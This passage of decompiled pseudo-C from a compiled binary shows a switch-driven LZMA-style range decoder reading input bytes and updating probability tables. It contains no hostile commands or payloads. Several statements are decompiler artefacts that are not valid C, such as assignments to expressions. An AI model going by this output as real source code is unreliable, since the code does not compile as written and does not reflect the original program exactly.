                                                                                                                                                                                                                            							L23:
                                                                                                                                                                                                                            							__eflags = _v112;
                                                                                                                                                                                                                            							if(_v112 == 0) {
                                                                                                                                                                                                                            								_v140 = 3;
                                                                                                                                                                                                                            								goto L173;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_v112 = _v112 - 1;
                                                                                                                                                                                                                            							_t72 =  &_v116;
                                                                                                                                                                                                                            							 *_t72 = _v116 + 1;
                                                                                                                                                                                                                            							__eflags =  *_t72;
                                                                                                                                                                                                                            							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                                                                                                                            							L25:
                                                                                                                                                                                                                            							_v76 = _v76 - 1;
                                                                                                                                                                                                                            							__eflags = _v76;
                                                                                                                                                                                                                            							if(_v76 != 0) {
                                                                                                                                                                                                                            								goto L23;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							goto L26;
                                                                                                                                                                                                                            						case 4:
                                                                                                                                                                                                                            							L136:
                                                                                                                                                                                                                            							_t559 =  *_t626;
                                                                                                                                                                                                                            							_t610 = _t559 & 0x0000ffff;
                                                                                                                                                                                                                            							_t591 = (_v20 >> 0xb) * _t610;
                                                                                                                                                                                                                            							__eflags = _v16 - _t591;
                                                                                                                                                                                                                            							if(_v16 >= _t591) {
                                                                                                                                                                                                                            								_v20 = _v20 - _t591;
                                                                                                                                                                                                                            								_v16 = _v16 - _t591;
                                                                                                                                                                                                                            								_v68 = 1;
                                                                                                                                                                                                                            								_t560 = _t559 - (_t559 >> 5);
                                                                                                                                                                                                                            								__eflags = _t560;
                                                                                                                                                                                                                            								 *_t626 = _t560;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								_v20 = _t591;
                                                                                                                                                                                                                            								_v68 = _v68 & 0x00000000;
                                                                                                                                                                                                                            								 *_t626 = (0x800 - _t610 >> 5) + _t559;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__eflags = _v20 - 0x1000000;
                                                                                                                                                                                                                            							if(_v20 >= 0x1000000) {
                                                                                                                                                                                                                            								goto L142;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								goto L140;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						case 5:
                                                                                                                                                                                                                            							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__ecx = _v44;
                                                                                                                                                                                                                            							_v40 = _v44;
                                                                                                                                                                                                                            							L91:
                                                                                                                                                                                                                            							__ecx = _v48;
                                                                                                                                                                                                                            							_v48 = __eax;
                                                                                                                                                                                                                            							_v44 = _v48;
                                                                                                                                                                                                                            							L92:
                                                                                                                                                                                                                            							__eax = _v8;
                                                                                                                                                                                                                            							_v132 = 0x15;
                                                                                                                                                                                                                            							__eax = _v8 + 0xa68;
                                                                                                                                                                                                                            							_v92 = _v8 + 0xa68;
                                                                                                                                                                                                                            							goto L71;
                                                                                                                                                                                                                            						case 0xc:
                                                                                                                                                                                                                            							L102:
                                                                                                                                                                                                                            							__eflags = _v112;
                                                                                                                                                                                                                            							if(_v112 == 0) {
                                                                                                                                                                                                                            								_v140 = 0xc;
                                                                                                                                                                                                                            								goto L173;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__ecx = _v116;
                                                                                                                                                                                                                            							__eax = _v16;
                                                                                                                                                                                                                            							_v20 = _v20 << 8;
                                                                                                                                                                                                                            							__ecx =  *_v116 & 0x000000ff;
                                                                                                                                                                                                                            							_v112 = _v112 - 1;
                                                                                                                                                                                                                            							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                                                                                                                            							_t340 =  &_v116;
                                                                                                                                                                                                                            							 *_t340 = _v116 + 1;
                                                                                                                                                                                                                            							__eflags =  *_t340;
                                                                                                                                                                                                                            							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                                                                                                                            							__eax = _v48;
                                                                                                                                                                                                                            							goto L104;
                                                                                                                                                                                                                            						case 0xd:
                                                                                                                                                                                                                            							L39:
                                                                                                                                                                                                                            							__eflags = _v112;
                                                                                                                                                                                                                            							if(_v112 == 0) {
                                                                                                                                                                                                                            								_v140 = 0xd;
                                                                                                                                                                                                                            								goto L173;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__ecx = _v116;
                                                                                                                                                                                                                            							__eax = _v16;
                                                                                                                                                                                                                            							_v20 = _v20 << 8;
                                                                                                                                                                                                                            							__ecx =  *_v116 & 0x000000ff;
                                                                                                                                                                                                                            							_v112 = _v112 - 1;
                                                                                                                                                                                                                            							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                                                                                                                            							_t127 =  &_v116;
                                                                                                                                                                                                                            							 *_t127 = _v116 + 1;
                                                                                                                                                                                                                            							__eflags =  *_t127;
                                                                                                                                                                                                                            							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                                                                                                                            							L41:
                                                                                                                                                                                                                            							__eax = _v68;
                                                                                                                                                                                                                            							__eflags = _v76 - _v68;
                                                                                                                                                                                                                            							if(_v76 != _v68) {
                                                                                                                                                                                                                            								goto L50;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__eflags = __ebx - 0x100;
                                                                                                                                                                                                                            							if(__ebx >= 0x100) {
                                                                                                                                                                                                                            								goto L56;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							L43:
                                                                                                                                                                                                                            							__eax = _v95 & 0x000000ff;
                                                                                                                                                                                                                            							_v95 = _v95 << 1;
                                                                                                                                                                                                                            							__ecx = _v92;
                                                                                                                                                                                                                            							__eax = (_v95 & 0x000000ff) >> 7;
                                                                                                                                                                                                                            							_v76 = __eax;
                                                                                                                                                                                                                            							__eax = __eax + 1;
                                                                                                                                                                                                                            							__eax = __eax << 8;
                                                                                                                                                                                                                            							__eax = __eax + __ebx;
                                                                                                                                                                                                                            							__esi = _v92 + __eax * 2;
                                                                                                                                                                                                                            							_v20 = _v20 >> 0xb;
                                                                                                                                                                                                                            							__ax =  *__esi;
                                                                                                                                                                                                                            							_v88 = __esi;
                                                                                                                                                                                                                            							__edx = __ax & 0x0000ffff;
                                                                                                                                                                                                                            							__ecx = (_v20 >> 0xb) * __edx;
                                                                                                                                                                                                                            							__eflags = _v16 - __ecx;
                                                                                                                                                                                                                            							if(_v16 >= __ecx) {
                                                                                                                                                                                                                            								_v20 = _v20 - __ecx;
                                                                                                                                                                                                                            								_v16 = _v16 - __ecx;
                                                                                                                                                                                                                            								__cx = __ax;
                                                                                                                                                                                                                            								_v68 = 1;
                                                                                                                                                                                                                            								__cx = __ax >> 5;
                                                                                                                                                                                                                            								__eflags = __eax;
                                                                                                                                                                                                                            								__ebx = __ebx + __ebx + 1;
                                                                                                                                                                                                                            								 *__esi = __ax;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								_v68 = _v68 & 0x00000000;
                                                                                                                                                                                                                            								_v20 = __ecx;
                                                                                                                                                                                                                            								0x800 = 0x800 - __edx;
                                                                                                                                                                                                                            								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                                                                                                                                                            								__ebx = __ebx + __ebx;
                                                                                                                                                                                                                            								 *__esi = __cx;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__eflags = _v20 - 0x1000000;
                                                                                                                                                                                                                            							_v72 = __ebx;
                                                                                                                                                                                                                            							if(_v20 >= 0x1000000) {
                                                                                                                                                                                                                            								goto L41;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								goto L39;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						case 0xe:
                                                                                                                                                                                                                            							L48:
                                                                                                                                                                                                                            							__eflags = _v112;
                                                                                                                                                                                                                            							if(_v112 == 0) {
                                                                                                                                                                                                                            								_v140 = 0xe;
                                                                                                                                                                                                                            								goto L173;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__ecx = _v116;
                                                                                                                                                                                                                            							__eax = _v16;
                                                                                                                                                                                                                            							_v20 = _v20 << 8;
                                                                                                                                                                                                                            							__ecx =  *_v116 & 0x000000ff;
                                                                                                                                                                                                                            							_v112 = _v112 - 1;
                                                                                                                                                                                                                            							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                                                                                                                            							_t161 =  &_v116;
                                                                                                                                                                                                                            							 *_t161 = _v116 + 1;
                                                                                                                                                                                                                            							__eflags =  *_t161;
                                                                                                                                                                                                                            							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                                                                                                                            							while(1) {
                                                                                                                                                                                                                            								L50:
                                                                                                                                                                                                                            								__eflags = __ebx - 0x100;
                                                                                                                                                                                                                            								if(__ebx >= 0x100) {
                                                                                                                                                                                                                            									break;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								__eax = _v92;
                                                                                                                                                                                                                            								__edx = __ebx + __ebx;
                                                                                                                                                                                                                            								__ecx = _v20;
                                                                                                                                                                                                                            								__esi = __edx + __eax;
                                                                                                                                                                                                                            								__ecx = _v20 >> 0xb;
                                                                                                                                                                                                                            								__ax =  *__esi;
                                                                                                                                                                                                                            								_v88 = __esi;
                                                                                                                                                                                                                            								__edi = __ax & 0x0000ffff;
                                                                                                                                                                                                                            								__ecx = (_v20 >> 0xb) * __edi;
                                                                                                                                                                                                                            								__eflags = _v16 - __ecx;
                                                                                                                                                                                                                            								if(_v16 >= __ecx) {
                                                                                                                                                                                                                            									_v20 = _v20 - __ecx;
                                                                                                                                                                                                                            									_v16 = _v16 - __ecx;
                                                                                                                                                                                                                            									__cx = __ax;
                                                                                                                                                                                                                            									_t175 = __edx + 1; // 0x1
                                                                                                                                                                                                                            									__ebx = _t175;
                                                                                                                                                                                                                            									__cx = __ax >> 5;
                                                                                                                                                                                                                            									__eflags = __eax;
                                                                                                                                                                                                                            									 *__esi = __ax;
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									_v20 = __ecx;
                                                                                                                                                                                                                            									0x800 = 0x800 - __edi;
                                                                                                                                                                                                                            									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                                                                            									__ebx = __ebx + __ebx;
                                                                                                                                                                                                                            									 *__esi = __cx;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								__eflags = _v20 - 0x1000000;
                                                                                                                                                                                                                            								_v72 = __ebx;
                                                                                                                                                                                                                            								if(_v20 >= 0x1000000) {
                                                                                                                                                                                                                            									continue;
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									goto L48;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							L56:
                                                                                                                                                                                                                            							_t178 =  &_v56;
                                                                                                                                                                                                                            							 *_t178 = _v56 & 0x00000000;
                                                                                                                                                                                                                            							__eflags =  *_t178;
                                                                                                                                                                                                                            							goto L57;
                                                                                                                                                                                                                            						case 0xf:
                                                                                                                                                                                                                            							L60:
                                                                                                                                                                                                                            							__eflags = _v112;
                                                                                                                                                                                                                            							if(_v112 == 0) {
                                                                                                                                                                                                                            								_v140 = 0xf;
                                                                                                                                                                                                                            								goto L173;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__ecx = _v116;
                                                                                                                                                                                                                            							__eax = _v16;
                                                                                                                                                                                                                            							_v20 = _v20 << 8;
                                                                                                                                                                                                                            							__ecx =  *_v116 & 0x000000ff;
                                                                                                                                                                                                                            							_v112 = _v112 - 1;
                                                                                                                                                                                                                            							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                                                                                                                            							_t208 =  &_v116;
                                                                                                                                                                                                                            							 *_t208 = _v116 + 1;
                                                                                                                                                                                                                            							__eflags =  *_t208;
                                                                                                                                                                                                                            							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                                                                                                                            							L62:
                                                                                                                                                                                                                            							__eflags = __ebx - 0x100;
                                                                                                                                                                                                                            							if(__ebx >= 0x100) {
                                                                                                                                                                                                                            								L57:
                                                                                                                                                                                                                            								__al = _v72;
                                                                                                                                                                                                                            								_v96 = _v72;
                                                                                                                                                                                                                            								goto L58;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							L63:
                                                                                                                                                                                                                            							__eax = _v92;
                                                                                                                                                                                                                            							__edx = __ebx + __ebx;
                                                                                                                                                                                                                            							__ecx = _v20;
                                                                                                                                                                                                                            							__esi = __edx + __eax;
                                                                                                                                                                                                                            							__ecx = _v20 >> 0xb;
                                                                                                                                                                                                                            							__ax =  *__esi;
                                                                                                                                                                                                                            							_v88 = __esi;
                                                                                                                                                                                                                            							__edi = __ax & 0x0000ffff;
                                                                                                                                                                                                                            							__ecx = (_v20 >> 0xb) * __edi;
                                                                                                                                                                                                                            							__eflags = _v16 - __ecx;
                                                                                                                                                                                                                            							if(_v16 >= __ecx) {
                                                                                                                                                                                                                            								_v20 = _v20 - __ecx;
                                                                                                                                                                                                                            								_v16 = _v16 - __ecx;
                                                                                                                                                                                                                            								__cx = __ax;
                                                                                                                                                                                                                            								_t222 = __edx + 1; // 0x1
                                                                                                                                                                                                                            								__ebx = _t222;
                                                                                                                                                                                                                            								__cx = __ax >> 5;
                                                                                                                                                                                                                            								__eflags = __eax;
                                                                                                                                                                                                                            								 *__esi = __ax;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								_v20 = __ecx;
                                                                                                                                                                                                                            								0x800 = 0x800 - __edi;
                                                                                                                                                                                                                            								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                                                                            								__ebx = __ebx + __ebx;
                                                                                                                                                                                                                            								 *__esi = __cx;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__eflags = _v20 - 0x1000000;
                                                                                                                                                                                                                            							_v72 = __ebx;
                                                                                                                                                                                                                            							if(_v20 >= 0x1000000) {
                                                                                                                                                                                                                            								goto L62;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								goto L60;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						case 0x10:
                                                                                                                                                                                                                            							L112:
                                                                                                                                                                                                                            							__eflags = _v112;
                                                                                                                                                                                                                            							if(_v112 == 0) {
                                                                                                                                                                                                                            								_v140 = 0x10;
                                                                                                                                                                                                                            								goto L173;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__ecx = _v116;
                                                                                                                                                                                                                            							__eax = _v16;
                                                                                                                                                                                                                            							_v20 = _v20 << 8;
                                                                                                                                                                                                                            							__ecx =  *_v116 & 0x000000ff;
                                                                                                                                                                                                                            							_v112 = _v112 - 1;
                                                                                                                                                                                                                            							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                                                                                                                            							_t371 =  &_v116;
                                                                                                                                                                                                                            							 *_t371 = _v116 + 1;
                                                                                                                                                                                                                            							__eflags =  *_t371;
                                                                                                                                                                                                                            							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                                                                                                                            							goto L114;
                                                                                                                                                                                                                            						case 0x11:
                                                                                                                                                                                                                            							L71:
                                                                                                                                                                                                                            							__esi = _v92;
                                                                                                                                                                                                                            							_v136 = 0x12;
                                                                                                                                                                                                                            							goto L135;
                                                                                                                                                                                                                            						case 0x12:
                                                                                                                                                                                                                            							__eflags = _v68;
                                                                                                                                                                                                                            							if(_v68 != 0) {
                                                                                                                                                                                                                            								__eax = _v92;
                                                                                                                                                                                                                            								_v136 = 0x13;
                                                                                                                                                                                                                            								__esi = _v92 + 2;
                                                                                                                                                                                                                            								L135:
                                                                                                                                                                                                                            								_v88 = _t626;
                                                                                                                                                                                                                            								goto L136;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__eax = _v80;
                                                                                                                                                                                                                            							_v52 = _v52 & 0x00000000;
                                                                                                                                                                                                                            							__ecx = _v92;
                                                                                                                                                                                                                            							__eax = _v80 << 4;
                                                                                                                                                                                                                            							__eflags = __eax;
                                                                                                                                                                                                                            							__eax = _v92 + __eax + 4;
                                                                                                                                                                                                                            							goto L133;
                                                                                                                                                                                                                            						case 0x13:
                                                                                                                                                                                                                            							__eflags = _v68;
                                                                                                                                                                                                                            							if(_v68 != 0) {
                                                                                                                                                                                                                            								_t475 =  &_v92;
                                                                                                                                                                                                                            								 *_t475 = _v92 + 0x204;
                                                                                                                                                                                                                            								__eflags =  *_t475;
                                                                                                                                                                                                                            								_v52 = 0x10;
                                                                                                                                                                                                                            								_v68 = 8;
                                                                                                                                                                                                                            								L147:
                                                                                                                                                                                                                            								_v128 = 0x14;
                                                                                                                                                                                                                            								goto L148;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__eax = _v80;
                                                                                                                                                                                                                            							__ecx = _v92;
                                                                                                                                                                                                                            							__eax = _v80 << 4;
                                                                                                                                                                                                                            							_v52 = 8;
                                                                                                                                                                                                                            							__eax = _v92 + (_v80 << 4) + 0x104;
                                                                                                                                                                                                                            							L133:
                                                                                                                                                                                                                            							_v92 = __eax;
                                                                                                                                                                                                                            							_v68 = 3;
                                                                                                                                                                                                                            							goto L147;
                                                                                                                                                                                                                            						case 0x14:
                                                                                                                                                                                                                            							_v52 = _v52 + __ebx;
                                                                                                                                                                                                                            							__eax = _v132;
                                                                                                                                                                                                                            							goto L143;
                                                                                                                                                                                                                            						case 0x15:
                                                                                                                                                                                                                            							__eax = 0;
                                                                                                                                                                                                                            							__eflags = _v60 - 7;
                                                                                                                                                                                                                            							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                                                                                                                            							__al = __al & 0x000000fd;
                                                                                                                                                                                                                            							__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                                                                                            							_v60 = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                                                                                            							goto L123;
                                                                                                                                                                                                                            						case 0x16:
                                                                                                                                                                                                                            							__eax = _v52;
                                                                                                                                                                                                                            							__eflags = __eax - 4;
                                                                                                                                                                                                                            							if(__eax >= 4) {
                                                                                                                                                                                                                            								_push(3);
                                                                                                                                                                                                                            								_pop(__eax);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__ecx = _v8;
                                                                                                                                                                                                                            							_v68 = 6;
                                                                                                                                                                                                                            							__eax = __eax << 7;
                                                                                                                                                                                                                            							_v128 = 0x19;
                                                                                                                                                                                                                            							_v92 = __eax;
                                                                                                                                                                                                                            							goto L148;
                                                                                                                                                                                                                            						case 0x17:
                                                                                                                                                                                                                            							L148:
                                                                                                                                                                                                                            							__eax = _v68;
                                                                                                                                                                                                                            							_v84 = 1;
                                                                                                                                                                                                                            							_v76 = _v68;
                                                                                                                                                                                                                            							goto L152;
                                                                                                                                                                                                                            						case 0x18:
                                                                                                                                                                                                                            							L149:
                                                                                                                                                                                                                            							__eflags = _v112;
                                                                                                                                                                                                                            							if(_v112 == 0) {
                                                                                                                                                                                                                            								_v140 = 0x18;
                                                                                                                                                                                                                            								goto L173;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__ecx = _v116;
                                                                                                                                                                                                                            							__eax = _v16;
                                                                                                                                                                                                                            							_v20 = _v20 << 8;
                                                                                                                                                                                                                            							__ecx =  *_v116 & 0x000000ff;
                                                                                                                                                                                                                            							_v112 = _v112 - 1;
                                                                                                                                                                                                                            							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                                                                                                                            							_t490 =  &_v116;
                                                                                                                                                                                                                            							 *_t490 = _v116 + 1;
                                                                                                                                                                                                                            							__eflags =  *_t490;
                                                                                                                                                                                                                            							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                                                                                                                            							L151:
                                                                                                                                                                                                                            							_t493 =  &_v76;
                                                                                                                                                                                                                            							 *_t493 = _v76 - 1;
                                                                                                                                                                                                                            							__eflags =  *_t493;
                                                                                                                                                                                                                            							L152:
                                                                                                                                                                                                                            							__eflags = _v76;
                                                                                                                                                                                                                            							if(_v76 <= 0) {
                                                                                                                                                                                                                            								__ecx = _v68;
                                                                                                                                                                                                                            								__ebx = _v84;
                                                                                                                                                                                                                            								0 = 1;
                                                                                                                                                                                                                            								__eax = 1 << __cl;
                                                                                                                                                                                                                            								__ebx = _v84 - (1 << __cl);
                                                                                                                                                                                                                            								__eax = _v128;
                                                                                                                                                                                                                            								_v72 = __ebx;
                                                                                                                                                                                                                            								L143:
                                                                                                                                                                                                                            								_v140 = _t561;
                                                                                                                                                                                                                            								goto L3;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__eax = _v84;
                                                                                                                                                                                                                            							_v20 = _v20 >> 0xb;
                                                                                                                                                                                                                            							__edx = _v84 + _v84;
                                                                                                                                                                                                                            							__eax = _v92;
                                                                                                                                                                                                                            							__esi = __edx + __eax;
                                                                                                                                                                                                                            							_v88 = __esi;
                                                                                                                                                                                                                            							__ax =  *__esi;
                                                                                                                                                                                                                            							__edi = __ax & 0x0000ffff;
                                                                                                                                                                                                                            							__ecx = (_v20 >> 0xb) * __edi;
                                                                                                                                                                                                                            							__eflags = _v16 - __ecx;
                                                                                                                                                                                                                            							if(_v16 >= __ecx) {
                                                                                                                                                                                                                            								_v20 = _v20 - __ecx;
                                                                                                                                                                                                                            								_v16 = _v16 - __ecx;
                                                                                                                                                                                                                            								__cx = __ax;
                                                                                                                                                                                                                            								__cx = __ax >> 5;
                                                                                                                                                                                                                            								__eax = __eax - __ecx;
                                                                                                                                                                                                                            								__edx = __edx + 1;
                                                                                                                                                                                                                            								__eflags = __edx;
                                                                                                                                                                                                                            								 *__esi = __ax;
                                                                                                                                                                                                                            								_v84 = __edx;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								_v20 = __ecx;
                                                                                                                                                                                                                            								0x800 = 0x800 - __edi;
                                                                                                                                                                                                                            								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                                                                            								_v84 = _v84 << 1;
                                                                                                                                                                                                                            								 *__esi = __cx;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__eflags = _v20 - 0x1000000;
                                                                                                                                                                                                                            							if(_v20 >= 0x1000000) {
                                                                                                                                                                                                                            								goto L151;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								goto L149;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						case 0x19:
                                                                                                                                                                                                                            							__eflags = __ebx - 4;
                                                                                                                                                                                                                            							if(__ebx < 4) {
                                                                                                                                                                                                                            								_v48 = __ebx;
                                                                                                                                                                                                                            								L122:
                                                                                                                                                                                                                            								_t399 =  &_v48;
                                                                                                                                                                                                                            								 *_t399 = _v48 + 1;
                                                                                                                                                                                                                            								__eflags =  *_t399;
                                                                                                                                                                                                                            								L123:
                                                                                                                                                                                                                            								__eax = _v48;
                                                                                                                                                                                                                            								__eflags = __eax;
                                                                                                                                                                                                                            								if(__eax == 0) {
                                                                                                                                                                                                                            									_v52 = _v52 | 0xffffffff;
                                                                                                                                                                                                                            									goto L173;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								__eflags = __eax - _v100;
                                                                                                                                                                                                                            								if(__eax > _v100) {
                                                                                                                                                                                                                            									goto L174;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								_v52 = _v52 + 2;
                                                                                                                                                                                                                            								__eax = _v52;
                                                                                                                                                                                                                            								_t406 =  &_v100;
                                                                                                                                                                                                                            								 *_t406 = _v100 + _v52;
                                                                                                                                                                                                                            								__eflags =  *_t406;
                                                                                                                                                                                                                            								goto L126;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__ecx = __ebx;
                                                                                                                                                                                                                            							__eax = __ebx;
                                                                                                                                                                                                                            							__ecx = __ebx >> 1;
                                                                                                                                                                                                                            							__eax = __ebx & 0x00000001;
                                                                                                                                                                                                                            							__ecx = (__ebx >> 1) - 1;
                                                                                                                                                                                                                            							__al = __al | 0x00000002;
                                                                                                                                                                                                                            							__eax = (__ebx & 0x00000001) << __cl;
                                                                                                                                                                                                                            							__eflags = __ebx - 0xe;
                                                                                                                                                                                                                            							_v48 = __eax;
                                                                                                                                                                                                                            							if(__ebx >= 0xe) {
                                                                                                                                                                                                                            								__ebx = 0;
                                                                                                                                                                                                                            								_v76 = __ecx;
                                                                                                                                                                                                                            								L105:
                                                                                                                                                                                                                            								__eflags = _v76;
                                                                                                                                                                                                                            								if(_v76 <= 0) {
                                                                                                                                                                                                                            									__eax = __eax + __ebx;
                                                                                                                                                                                                                            									_v68 = 4;
                                                                                                                                                                                                                            									_v48 = __eax;
                                                                                                                                                                                                                            									__eax = _v8;
                                                                                                                                                                                                                            									__eax = _v8 + 0x644;
                                                                                                                                                                                                                            									__eflags = __eax;
                                                                                                                                                                                                                            									L111:
                                                                                                                                                                                                                            									__ebx = 0;
                                                                                                                                                                                                                            									_v92 = __eax;
                                                                                                                                                                                                                            									_v84 = 1;
                                                                                                                                                                                                                            									_v72 = 0;
                                                                                                                                                                                                                            									_v76 = 0;
                                                                                                                                                                                                                            									L115:
                                                                                                                                                                                                                            									__eax = _v68;
                                                                                                                                                                                                                            									__eflags = _v76 - _v68;
                                                                                                                                                                                                                            									if(_v76 >= _v68) {
                                                                                                                                                                                                                            										_t397 =  &_v48;
